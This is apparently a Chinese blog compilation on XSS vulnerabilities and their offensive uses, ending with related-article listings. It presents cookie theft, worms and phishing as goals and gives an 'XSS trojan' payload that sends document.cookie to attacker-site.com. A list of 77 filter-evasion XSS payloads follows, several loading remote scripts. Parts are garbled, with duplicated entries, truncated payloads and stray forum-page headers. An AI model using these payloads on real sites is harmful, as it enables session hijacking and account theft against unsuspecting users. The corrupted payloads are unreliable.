Atitit. Xss 漏洞的原理and应用xss木马

1. XSS漏洞1

2. XSS的用途2

2.1. 盗取cookie2

2.2. 刷新流量 刷分3

2.3. DOS 窃取隐私”、“假冒身份”、“WEB蠕虫3

2.4. 广告植入 弹窗 、信息收集 、流量转发 甚至是路由劫持3

2.5. 钓鱼攻击,高级的钓鱼技巧。3

2.6. 删除目标文章、恶意篡改数据、嫁祸。3

2.7. 劫持用户Web行为,甚至进一步渗透内网。3

2.8. 爆发Web2.0蠕虫。3

2.9. 蠕虫式的DDoS攻击。3

2.10. 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。。3

2.11. (1)协助csrf。3

2.12. (2)收集用户信息。3

2.13. xss搞一些论坛做营销推广我的东西...3

2.14. 有邮箱的xss漏洞,可以通过邮件直接xss,3

3. 三、XSS分类4

4. Xss木马4

4.1. xss的优势 xss的弊端4

5. 瑞福5

6. 附常见的XSS攻击方法5

1. XSS漏洞

跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行

理论上,所有可输入的地方没有对输入数据进行处理的话,都会存在XSS漏洞,漏洞的危害取决于攻击代码的威力,攻击代码也不局限于script。

在整个web渗透过程中,很多时候没有路可走,也许XSS的出现就能打开局面。

在一些大型网站的时候,只要用的好,xss比sql注入还好用。很多sql注入,得到的hash是解不出来的。而大部分网站都没有http-only保护,xss能够发挥的淋漓尽致。
当然,xss不仅仅是用于获取cookie,但最常用的还是获取cookie。

而xss的话, 也是相比sql更为有力的一种渗透方式

作者:: 绰号:老哇的爪子 ( 全名::Attilax Akbar Al Rapanui 阿提拉克斯 阿克巴 阿尔 拉帕努伊 ) 汉字名:艾龙,  EMAIL:1466519819@qq.com

转载请注明来源: http://www.cnblogs.com/attilax/

2. XSS的用途

2.1. 盗取cookie

这时我们用cookie和session解决状态维护问题,当用户首次登入时,服务器为该用户创建一个 session ID,同时向游览器传送一个 cookie,cookie保存会话连接中用到的数据,session ID作为会话标识,游览器后续的请求均基于该session ID。

攻击者可以提供一个攻击链接,当用户点击该链接时,向攻击者自己的服务器发送一条保存有用户session ID的信息,这样就可以窃取到用户的session ID,得到用户的执行权限。

2.2. 刷新流量 刷分

2.3. DOS 窃取隐私”、“假冒身份”、“WEB蠕虫

2.4. 广告植入 弹窗 、信息收集 、流量转发 甚至是路由劫持

2.5. 钓鱼攻击,高级的钓鱼技巧。

2.6. 删除目标文章、恶意篡改数据、嫁祸。

2.7. 劫持用户Web行为,甚至进一步渗透内网。

2.8. 爆发Web2.0蠕虫。

2.9. 蠕虫式的DDoS攻击。

2.10. 蠕虫式挂马攻击、刷广告、刷浏量、破坏网上数据。。

2.11.  (1)协助csrf。

2.12. (2)收集用户信息。

2.13. xss搞一些论坛做营销推广我的东西...

2.14. 有邮箱的xss漏洞,可以通过邮件直接xss,

这个更为直接,试想一下,当你邮箱收到一封邮件,当你打开的时候,在另一个地方,别人用着你的信息访问了你的邮箱,如果你的邮箱不是看完就删的话,是多么恐怖的意见事情

3.  三、XSS分类

XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS。

1、反射型XSS

发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码。这个过程像一次反射,故叫反射型XSS。

4. Xss木马

首先,攻击者以一个普通用户登录进来,然后在输入框中提交以下数据:

<a href=# onclick=\"document.location=\'http://attacker-site.com/xss.php?c=\'+escape\(document.cookie\)\;\">bangerlee</a>

4.1. xss的优势 xss的弊端

1.局限性太大,因为只局限于客户端,又受限于javascript的权限,干不了太多事情,除非有0day,或者调用ActiveX做些坏事。
2.被动攻击。XSS属于被动攻击,一封精心构造的邮件发发过去,别人一天不点,你就要等一天,万一遇到对方休个产假,那就歇菜了。
xss的优势,也是它火的原因:
1.攻击成本并不高。自从有了各种xss平台,浏览着网站,好好的,随手就是一个盲打,根本停不下来,虽然收益有限,但成本很低,因此性价比很高。
2.不易被检测。存储型的XSS是很难被检测到的,即便是payload中的某个关键字触发了防御规则,也很容易变换绕过。
3.目前互联网上xss漏洞还是比较多的,想要发现并不难。以后就不好说了。

作者:菜客
链接:http://www.zhihu.com/question/24918141/answer/29484297
来源:知乎
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

5. 瑞福

xss攻击入门 - bangerlee - 博客园.htm

XSS攻击及防御 - 高爽 Coder - 博客频道 - CSDN.NET.htm

XSS攻击常识及常见的XSS攻击脚本汇总 - 推酷.htm

6. 附常见的XSS攻击方法

(1)普通的XSS JavaScript注入

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号

<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感

<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)

<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签

<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)

<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)

<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)

<IMG SRC=java..省略..XSS')>

(11)嵌入式标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车

<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子

<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)

<script>z=’document.’</script>

<script>z=z+’write(“‘</script>

<script>z=z+’<script’</script>

<script>z=z+’ src=ht’</script>

<script>z=z+’tp://ww’</script>

<script>z=z+’w.shell’</script>

<script>z=z+’.net/1.’</script>

<script>z=z+’js></sc’</script>

<script>z=z+’ript>”)’</script>

<script>eval_r(z)</script>

(17)空字符12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6

perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用

perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签

<IMG SRC=” javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS

<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3

<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号

<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS

<IMG SRC=”javascript:alert(‘XSS’)”

(27)双开角括号

<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript

\”;alert(‘XSS’);//

(30)结束Title标签

</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image

<INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY Image

<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签

<BODY(‘XSS’)>

(34)IMG Dynsrc

<IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG Lowsrc

<IMG LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND

<BGSOUND SRC=”javascript:alert(‘XSS’);”>

(37)STYLE sheet

<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表

<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)

<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript

<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url

<META HTTP-EQUIV=”refresh” CONTENT=”0;

URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe

<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame

<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

(44)Table

<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD

<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-

8&13&12288&65279)

<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(48)DIV expression

<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达

<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)

<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image

<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A

CLASS=XSS></A>

(52)IMG STYLE方式

exppression(alert(“XSS”))’>

(53)STYLE background

<STYLE><STYLE

type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE

<BASE HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS

<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码

a=”get”;

b=”URL(\”";

c=”javascript:”;

d=”alert(‘XSS’);\”)”;

eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上

<HTML xmlns:xss>

<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>

<xss:xss>XSS</xss:xss>

</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用

<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令

<IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤

<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)

<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)

<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

(64)

<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)

<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

(66)12-7-1 T00LS - Powered by Discuz! Board

https://www.t00ls.net/viewthread.php?action=printable&tid=15267 4/6

<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)

<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>

</SCRIPT>

(68)URL绕行

<A HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码

<A HREF=”http://3w.org”>XSS</A>

(70)IP十进制

<A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制

<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制

<A HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码

<A HREF=”h

tt p://6 6.000146.0×7.147/”">XSS</A>

(74)节省[http:] <A HREF=”//www.google.com/”>XSS</A>

(75)节省[www] <A HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS

<A HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接

<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

Atitit. Xss 漏洞的原理and应用xss木马的更多相关文章

  1. XSS漏洞攻击原理与解决办法

    转自:http://www.frostsky.com/2011/10/xss-hack/ 对于的用户输入中出现XSS漏洞的问题,主要是由于开发人员对XSS了解不足,安全的意识不够造成的.现在让我们来普 ...

  2. Java Web开发 - 持久型/存储型XSS漏洞

    Java Web开发 - 持久型/存储型XSS漏洞 1.什么是XSS漏洞攻击? XSS是跨站脚本攻击(Cross Site Scripting)的简称,之所以叫XSS而不是CSS相比大家都能明白了吧, ...

  3. JSONP 安全攻防技术(JSON劫持、 XSS漏洞)

    关于 JSONP JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案.他实现的基本原理是利用了 HTML 里 <script&g ...

  4. XSS 漏洞介绍

    概念: XSS 攻击:跨站脚本攻击 (Cross Site Scripting),为不和层叠样式表 (Cascading Style Sheets, CSS) 的缩写混淆.故将跨站脚本攻击缩写为 XS ...

  5. XSS漏洞自动化攻击工具XSSer

    XSS漏洞自动化攻击工具XSSer   XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS ...

  6. 从零学习安全测试,从XSS漏洞攻击和防御开始

    WeTest 导读 本篇包含了XSS漏洞攻击及防御详细介绍,包括漏洞基础.XSS基础.编码基础.XSS Payload.XSS攻击防御. 第一部分:漏洞攻防基础知识   XSS属于漏洞攻防,我们要研究 ...

  7. [80Sec]深掘XSS漏洞场景之XSS Rootkit

    顶80SEC的牛. 深掘XSS漏洞场景之XSS Rootkit[完整修订版] EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011 ...

  8. Web渗透测试(xss漏洞)

    Xss介绍—— XSS (cross-site script) 跨站脚本自1996年诞生以来,一直被OWASP(open web application security project) 评为十大安 ...

  9. 可别小看了XSS漏洞

    可别小看了XSS漏洞 ​ 对于初了解xss漏洞的人来说,XSS漏洞的危害就是获取受害者的cookie,来进行 'cookie劫持'. ​ 今天就总结一下XSS漏洞的危害性,望安全人员不要轻视,开发人员 ...

随机推荐

  1. 解决eclipse中android添加重载函数时参数为arg0,arg1的问题

    遇到同样的问题,发现有人已经解决了,大体意思就是为android sdk 添加 src,以下是文章链接 http://blog.csdn.net/u014084081/article/details/ ...

  2. CSS实例

    CSS 实例 CSS背景 设置页面的背景颜色 设置不同元素的背景颜色 设置一个图像作为页面的背景 错误的的背景图片 如何在水平方向重复背景图像 如何定位背景图像 一个固定的背景图片(这个图片不会随页面 ...

  3. maven -- 问题解决(一)解决eclipse中maven项目出现的问题

    配置项目时出现的错误: error: Cannot change version of project facet Dynamic Web Module to 2.5. error: One or m ...

  4. C++的最佳特性(译)

    最近看到了很多优秀的文章,包括<Why mobile web apps are slow>,实在忍不住翻译出来跟大家分享.这篇文章通过大量的实验和参考文献向我们说明移动应用开发所遇到的问题 ...

  5. 斐波那契堆(一)之 图文解析 和 C语言的实现

    概要 本章介绍斐波那契堆.和以往一样,本文会先对斐波那契堆的理论知识进行简单介绍,然后给出C语言的实现.后续再分别给出C++和Java版本的实现:实现的语言虽不同,但是原理如出一辙,选择其中之一进行了 ...

  6. android小技巧和注意事项

    在listView 或者 gridView 的使用中,通常不仅仅为了展现数据,更多的是操作数据.于是当控件重合在一起时,我们需要添加事件.就会出现一个问题,当点击一个控件和长按这个控件时,常常出现长按 ...

  7. Spring Remoting: Hessian--转

    原文地址:http://www.studytrails.com/frameworks/spring/spring-remoting-hessian.jsp Concept Overview The p ...

  8. python异常处理(基础)

    之前在学习python的时候有整理过python异常处理的文章,不够简单也不够完整,所以决定再整理一篇,算做补充. http://www.cnblogs.com/fnng/archive/2013/0 ...

  9. [Matlab] Galois Field

    1. gf(M)用来把M转换到伽罗华域 2. gf(M.x)用来把M转换到实数域

  10. JAVA jdbc(数据库连接池)学习笔记(一)

    学习内容: 1.JDBC的含义... JDBC想必学过JAVA的就不会陌生,JDBC到底是什么呢?其实就是由JAVA的一些类和接口构成的API,保存在java.sql和javax.sql..包中的一些 ...